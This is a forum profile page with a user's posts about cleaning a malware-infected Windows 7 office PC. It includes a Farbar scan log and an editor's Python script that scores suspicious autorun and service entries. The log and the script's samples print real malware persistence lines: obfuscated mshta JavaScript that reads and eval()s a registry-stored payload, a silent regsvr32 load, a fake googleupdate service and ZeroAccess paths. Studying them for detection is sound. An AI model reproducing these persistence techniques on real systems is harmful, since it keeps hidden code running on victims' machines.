
amyr

Everything posted by amyr

  1. That worked great and everything is running great. Thank you so very, very much!!!!
  2. I did. I used the AVG remover tool and then used a link they sent, and it still got to 96% and stopped and said error. Am I okay with what's on there, or should I try again?
  3. Everything was fine except AVG would not install. I uninstalled it, reinstalled it and it would give me an error message every time. So I went ahead and put the other programs on there - the Malware anti-malware, anti-exploit, unchecky, and mcshield.
  4. It seems to be working fine. Do I need to add any kind of special virus protection? Do you think all of the viruses are gone now?
  5. I was able to remove those programs with no issues. I have attached the fixlog Fixlog.txt
  6. I turned off the virus protection that it had on and now it will open. I have attached the scan. I can't believe I didn't think to do that earlier. FRST.txt Addition.txt
  7. I went ahead and attached the log from where I opened it in Safe Mode. It won't do it in normal mode though. FRST.txt
  8. It will work if I open it in Safe Mode though... do you want that log?
  9. It will not open it. I downloaded it again and the same thing happens. An icon appears at the bottom of the monitor and if I click on it the message pops up "scripts paused" and under that it says exit. Even if I open it from the flashdrive it does the same thing.
  10. I restarted it and opened some things and shut it down and I did not get that message about windows this time. Fixlog.txt
  11. I have attached the log for the scan I ran this morning. I ended up just running it in recovery mode and using the command prompt and doing it because I couldn't ever get it to work any other way. FRST.txt
  12. Sorry I haven't responded. We work Tuesday - Saturday so I won't be able to work on it again until tomorrow. I will try again then.
  13. I downloaded the tool to my desktop, but when I double-click it nothing happens. An icon shows up on the taskbar at the bottom, but I can't get it to open. What am I doing wrong? I attached a picture of it.
  14. Sorry to keep bothering you, but everything looks okay except when I try to shut down the computer I get a message about forcing QBW32.EXE to close. I didn't know if that was something I should be worried about or not. I attached a picture of the message. Sorry, just paranoid now that there is something still lurking around the machine.
  15. You still there? I just wondered if everything was okay now or should I do something else?
  16. I have to leave work for today, but I will check back in the morning. Thanks for your help.
  17. My Windows 7 OS has just a black screen with the cursor in the middle. I have tried to launch it in Safe Mode and everything else that all the other forums suggested, but nothing is working. I found another topic on this site that had information that was for that specific computer, so now that I have downloaded the Farbar tool and scanned the infected computer I don't know what the next step is... If anyone could offer some help it would be greatly appreciated. If I am not going about this the right way then I apologize. Here are the results of the Farbar scan:

      Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-09-2015 01
      Ran by SYSTEM on MININT-ITIPCP2 (11-09-2015 13:56:44)
      Running from F:\
      Platform: Windows 7 Home Premium (X64) Language: English (United States)
      Internet Explorer Version 9
      Boot Mode: Recovery
      Default: ControlSet003
      ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
      Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

      ==================== Registry (Whitelisted) ===========================

      (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

      HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");Fko57OhUa="6HIAubL9";GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");gWw3DEE6A="8P";eval(GvG7H0);dqi3qj (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
      HKLM-x32\...\runonceex: [] => [X]
      Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X]
      Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
      HKLM\...\Policies\Explorer\Run: [**54c488f2<*>] => mshta javascript:Cmg9jOg1L="aRy";Jv59=new%20ActiveXObject("WScript.Shell");VXHzZ7iNp="70";Y5FOj6=Jv59.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");U7GKiyKah="tTM";eval(Y5FOj6);TMpv1GcW (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
      HKU\WTs Guns\...\Run: [**246c6654<*>] => mshta javascript:S94NqkIF="XzZ";NS30=new%20ActiveXObject("WScript.Shell");us6ac2cD="qu8dA";inUD1=NS30.RegRead("HKCU\\software\\24f0a094b5\\5abff29d");RxBDrj63b="FnsGPu2";eval(inUD1);vmqshgn8k8="wv6dzj (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
      HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT)
      HKU\WTs Guns\...\RunOnce: [*0d4fdb4] => C:\Users\WTs Guns\AppData\Roaming\b0d4fdb4.exe
      HKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl"
      AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\datamngr.dll => No File
      AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\IEBHO.dll => No File
      Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
      ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
      Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
      ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
      Startup: C:\Users\QBDataServiceUser18\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-04-30]
      ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
      Startup: C:\Users\QBDataServiceUser20\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-05-27]
      ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
      Startup: C:\Users\QBDataServiceUser24\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2014-03-07]
      ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
      BootExecute: autocheck autochk * C:\PROGRA~2\AVG\AVG2012\avgrsa.exe /sync /restart

      ==================== Services (Whitelisted) ========================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S4 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
      S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
      S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] ()
      S4 QuickBooksDB18; C:\Program Files (x86)\Intuit\QuickBooks 2008\QBDBMgrN.exe [128536 2006-09-13] (iAnywhere Solutions, Inc.)
      S3 QuickBooksDB20; C:\Program Files (x86)\Intuit\QuickBooks 2010\QBDBMgrN.exe [678912 2009-08-17] (Intuit, Inc.)
      S3 QuickBooksDB24; C:\Program Files (x86)\Intuit\QuickBooks 2014\QBDBMgrN.exe [679936 2013-12-02] (Intuit, Inc.)
      S4 vToolbarUpdater18.0.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.0\ToolbarUpdater.exe [1759768 2014-03-02] (AVG Secure Search)
      S2 PccNTUpd; "C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTUpd.exe" -service [X]

      ===================== Drivers (Whitelisted) ==========================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [28480 2012-04-19] (AVG Technologies CZ, s.r.o. )
      S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [307040 2012-11-08] (AVG Technologies CZ, s.r.o.)
      S1 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [47696 2011-12-23] (AVG Technologies CZ, s.r.o.)
      S0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [36944 2012-01-31] (AVG Technologies CZ, s.r.o.)
      S1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-03-02] (AVG Technologies)
      S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
      S0 Lbd; C:\Windows\System32\DRIVERS\Lbd.sys [69376 2012-07-24] (Lavasoft AB)
      S0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-09] (Corel Corporation)
      S3 Lavasoft Kernexplorer; \??\C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys [X]
      S1 SBRE; \??\C:\Windows\system32\drivers\SBREdrv.sys [X]

      ==================== NetSvcs (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      ==================== One Month Created files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2015-09-11 13:56 - 2015-09-11 13:56 - 00000000 ____D C:\FRST
      2015-09-06 06:33 - 2015-09-06 06:33 - 00000000 ____D C:\ProgramData\YojaWifo
      2015-09-06 06:32 - 2015-09-06 06:34 - 00000157 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.dat
      2015-09-06 06:32 - 2015-09-06 06:32 - 00358400 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.exe
      2015-09-01 12:59 - 2015-09-07 13:29 - 00000504 ____H C:\Windows\Tasks\35eff4f8f3fd23f10907f307.job
      2015-09-01 12:59 - 2015-09-07 11:14 - 00000382 ____H C:\Windows\Tasks\CryptoUpdate.job
      2015-09-01 12:59 - 2015-09-07 10:44 - 00002962 _____ C:\Windows\System32\Tasks\CryptoUpdate
      2015-09-01 12:59 - 2015-09-01 12:59 - 00003084 _____ C:\Windows\System32\Tasks\35eff4f8f3fd23f10907f307
      2015-08-31 11:49 - 2015-08-31 11:49 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Google
      2015-08-31 05:23 - 2015-08-31 05:23 - 00000000 ___HD C:\b0d4fdb4
      2015-08-31 04:26 - 2015-08-31 04:26 - 00004096 _____ C:\ProgramData\hTew6txG06C4.dll
      2015-08-31 04:24 - 2015-08-31 04:24 - 00004096 _____ C:\ProgramData\p2hbAwRM06C4.dll
      2015-08-29 06:23 - 2015-08-29 06:24 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
      2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Upvhmedia
      2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Okrics
      2015-08-18 05:14 - 2015-08-28 04:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

      ==================== One Month Modified files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2015-09-11 09:23 - 2012-07-24 08:48 - 00026142 _____ C:\Windows\setupact.log
      2015-09-11 09:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
      2015-09-11 08:50 - 2009-07-13 21:13 - 00797996 _____ C:\Windows\System32\PerfStringBackup.INI
      2015-09-11 08:19 - 2012-07-24 07:45 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
      2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
      2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
      2015-09-09 09:57 - 2012-07-24 08:49 - 00089564 _____ C:\Windows\WindowsUpdate.log
      2015-09-09 09:43 - 2010-10-05 07:08 - 00000000 ____D C:\Windows\pss
      2015-09-02 09:30 - 2013-06-25 10:30 - 00079360 ___SH C:\Users\WTs Guns\Downloads\Thumbs.db
      2015-09-02 09:30 - 2012-10-03 08:53 - 00000000 ____D C:\Users\WTs Guns\Desktop\shop Pics
      2015-08-28 04:47 - 2012-07-24 08:48 - 00279972 _____ C:\Windows\PFRO.log
      2015-08-28 04:47 - 2012-05-03 04:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
      2015-08-28 04:34 - 2012-07-24 07:45 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
      2015-08-28 04:34 - 2012-07-24 07:45 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
      2015-08-28 04:34 - 2011-05-24 12:43 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
      2015-08-19 12:48 - 2013-11-01 07:28 - 00002426 _____ C:\Users\WTs Guns\Desktop\IMS V6.lnk
      2015-08-12 10:10 - 2013-04-09 10:33 - 00122368 ___SH C:\Users\WTs Guns\Desktop\Thumbs.db

      ZeroAccess:
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000000.@
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000032.@
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000064.@
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\00000004.@
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\1afb2d56
      C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\201d3dde

      ZeroAccess:
      C:\Users\WTs Guns\AppData\Local\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}

      Files to move or delete:
      ====================
      C:\ProgramData\hTew6txG06C4.dll
      C:\ProgramData\p2hbAwRM06C4.dll
      C:\Users\WTs Guns\aaaaaaaa.exe

      Some files in TEMP:
      ====================
      C:\Users\WTs Guns\AppData\Local\Temp\3fffb56d-6b40-4cd3-b5fb-0ac36bf72961.exe
      C:\Users\WTs Guns\AppData\Local\Temp\6013073.exe
      C:\Users\WTs Guns\AppData\Local\Temp\76FA.tmp.exe
      C:\Users\WTs Guns\AppData\Local\Temp\Abspdf.exe
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfu.dll
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuamd64.dll
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfui.dll
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuia64.dll
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiamd64.dll
      C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiia64.dll
      C:\Users\WTs Guns\AppData\Local\Temp\ApnStub.exe
      C:\Users\WTs Guns\AppData\Local\Temp\avguidx.dll
      C:\Users\WTs Guns\AppData\Local\Temp\C07A.tmp.exe
      C:\Users\WTs Guns\AppData\Local\Temp\cdintf.dll
      C:\Users\WTs Guns\AppData\Local\Temp\CommonInstaller.exe
      C:\Users\WTs Guns\AppData\Local\Temp\csrsss.exe
      C:\Users\WTs Guns\AppData\Local\Temp\docviewe.exe
      C:\Users\WTs Guns\AppData\Local\Temp\install_flash_player_18_active_x.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
      C:\Users\WTs Guns\AppData\Local\Temp\MachineIdCreator.exe
      C:\Users\WTs Guns\AppData\Local\Temp\oi_{2D24F029-B2B5-4807-A2F5-C3CDF78AE31D}.exe
      C:\Users\WTs Guns\AppData\Local\Temp\PDFPRT400.exe
      C:\Users\WTs Guns\AppData\Local\Temp\readSTILog.dll
      C:\Users\WTs Guns\AppData\Local\Temp\ToolbarInstaller.exe
      C:\Users\WTs Guns\AppData\Local\Temp\UNINSTALL.EXE
      C:\Users\WTs Guns\AppData\Local\Temp\xmllite.dll

      ==================== Known DLLs (Whitelisted) =========================

      ==================== Bamital & volsnap =================

      (There is no automatic fix for files that do not pass verification.)

      C:\Windows\System32\winlogon.exe => MD5 is legit
      C:\Windows\System32\wininit.exe => MD5 is legit
      C:\Windows\SysWOW64\wininit.exe => MD5 is legit
      C:\Windows\explorer.exe => MD5 is legit
      C:\Windows\SysWOW64\explorer.exe => MD5 is legit
      C:\Windows\System32\svchost.exe => MD5 is legit
      C:\Windows\SysWOW64\svchost.exe => MD5 is legit
      C:\Windows\System32\services.exe => MD5 is legit
      C:\Windows\System32\User32.dll => MD5 is legit
      C:\Windows\SysWOW64\User32.dll => MD5 is legit
      C:\Windows\System32\userinit.exe => MD5 is legit
      C:\Windows\SysWOW64\userinit.exe => MD5 is legit
      C:\Windows\System32\rpcss.dll => MD5 is legit
      C:\Windows\System32\dnsapi.dll => MD5 is legit
      C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
      C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

      ==================== Restore Points =========================

      ==================== Memory info ===========================

      Percentage of memory in use: 11%
      Total physical RAM: 6108.98 MB
      Available physical RAM: 5384.06 MB
      Total Virtual: 6107.13 MB
      Available Virtual: 5387.99 MB

      ==================== Drives ================================

      Drive c: (OS) (Fixed) (Total:683.95 GB) (Free:469.29 GB) NTFS
      Drive f: (USB20FD) (Removable) (Total:7.51 GB) (Free:7.5 GB) FAT32
      Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
      Drive y: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:9.24 GB) NTFS ==>[system with boot components (obtained from reading drive)]

      ==================== MBR & Partition Table ==================

      ========================================================
      Disk: 0 (Size: 698.6 GB) (Disk ID: 78033E78)
      Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
      Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS)
      Partition 3: (Not Active) - (Size=683.9 GB) - (Type=07 NTFS)

      ========================================================
      Disk: 1 (Size: 7.5 GB) (Disk ID: 04DD5721)
      Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)

      LastRegBack: 2015-09-11 08:32

      ==================== End of FRST.txt ============================
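The autorun entries are the part of that FRST log a responder cares about: the HKLM Run, Policies\Explorer\Run and per-user Run values launch mshta with an inline javascript: URL that reads an obfuscated blob out of HKLM\software\Wow6432Node\24f0a094b5\5abff29d (HKCU\software\24f0a094b5\5abff29d in the user hive) and eval()s it, so the payload itself is never written to disk as a file; the value names carry characters FRST flags as invalid, a trick used to keep the value out of reach of ordinary registry tools; a RunOnce entry uses regsvr32 /s to load a .tpl file from the user's Crypto\RSA folder; and a service named googleupdate points at a randomly named executable with no company information sitting directly in C:\Windows. The script below is an added example by the editor, not part of the original thread and not FRST's own logic. It parses lines in FRST's Registry and Services format and scores them with those heuristics. The sample lines are copied from the log above (one benign AVG service line is kept as a control), while the heuristics themselves and the VENDOR_NAMES list are the editor's assumptions.

```python
"""Triage autorun and service entries from a Farbar Recovery Scan Tool (FRST) log.

Added example, not part of the original thread and not FRST's own logic. The
scoring heuristics and the VENDOR_NAMES list are the editor's assumptions; FRST
itself only marks value names with invalid characters.
"""
import re
from dataclasses import dataclass, field

# Sample input: lines copied from the FRST log posted above, plus one benign
# AVG service line kept as a control that must not be flagged.
SAMPLE_FRST = r"""
HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");eval(GvG7H0); <===== ATTENTION (Value Name with invalid characters)
HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT)
HKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl"
S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] ()
S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
"""

# FRST registry autorun line: <key>: [<value name>] => <command>
AUTORUN_RE = re.compile(
    r'^(?P<key>HK[^:]*?\\\.\.\.\\[^:]+):\s*\[(?P<name>[^\]]*)\]\s*=>\s*(?P<cmd>.*)$')
# FRST service line: <state> <name>; <path> [<size> <date>] (<company>)
SERVICE_RE = re.compile(
    r'^(?P<state>[SRU]\d)\s+(?P<name>[^;]+);\s+(?P<path>.*?)\s*'
    r'(?:\[\d+ [\d-]+\])?\s*\((?P<company>[^)]*)\)\s*$')

# Assumption: vendor names that malware likes to borrow for service names.
VENDOR_NAMES = ('google', 'microsoft', 'adobe', 'intel')


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def check_autorun(m):
    """Heuristics for one Run/RunOnce entry; returns a list of reasons."""
    name, cmd = m['name'], m['cmd']
    low = cmd.lower()
    reasons = []
    if re.search(r'[*<>?|]', name) or 'ATTENTION' in cmd:
        reasons.append('value name uses characters FRST flags as invalid')
    if re.search(r'\bmshta\b.*\b(javascript|vbscript):', low):
        reasons.append('mshta runs an inline script straight from the Run key')
    if 'regread(' in low and 'eval(' in low:
        reasons.append('script reads its payload from another registry value and eval()s it (fileless persistence)')
    if 'regsvr32' in low and '/s' in low and not re.search(r'\.(dll|ocx)"?\s*$', low):
        reasons.append('regsvr32 /s loads a file without a DLL/OCX extension')
    if re.search(r'c:\\[0-9a-f]{6,}\\|\\appdata\\roaming\\[0-9a-f]{6,}\.exe', low):
        reasons.append('executable with a hex-like name in a drop location')
    return reasons


def check_service(m):
    """Heuristics for one service entry; returns a list of reasons."""
    name, path, company = m['name'].lower(), m['path'].lower(), m['company'].strip()
    reasons = []
    if not company:
        reasons.append('service binary carries no company/version information')
    if re.match(r'c:\\windows\\[^\\]+\.exe$', path):
        reasons.append('service binary sits directly in C:\\Windows, not System32 or Program Files')
    borrowed = [v for v in VENDOR_NAMES if v in name]
    if borrowed and not any(v in path for v in borrowed):
        reasons.append('service name borrows vendor "%s" but its path does not' % borrowed[0])
    return reasons


def triage(log_text):
    """Return a Finding for every line that trips at least one heuristic."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = AUTORUN_RE.match(line)
        if m:
            reasons = check_autorun(m)
        else:
            s = SERVICE_RE.match(line)
            reasons = check_service(s) if s else []
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_FRST):
        print(f.line[:72] + ('...' if len(f.line) > 72 else ''))
        for r in f.reasons:
            print('   -', r)
```

Run it against a full FRST.txt by passing the file contents to triage(); the regexes only match the Registry and Services line shapes, so the file and driver sections are ignored. The point of scoring on several weak signals rather than one signature is that the random names in this log (24f0a094b5, b0d4fdb4, bswiWxhdyvnHhyL) change per infection, while the mechanics (mshta plus RegRead plus eval, regsvr32 /s on a non-DLL, a vendor-named service outside a vendor path) do not.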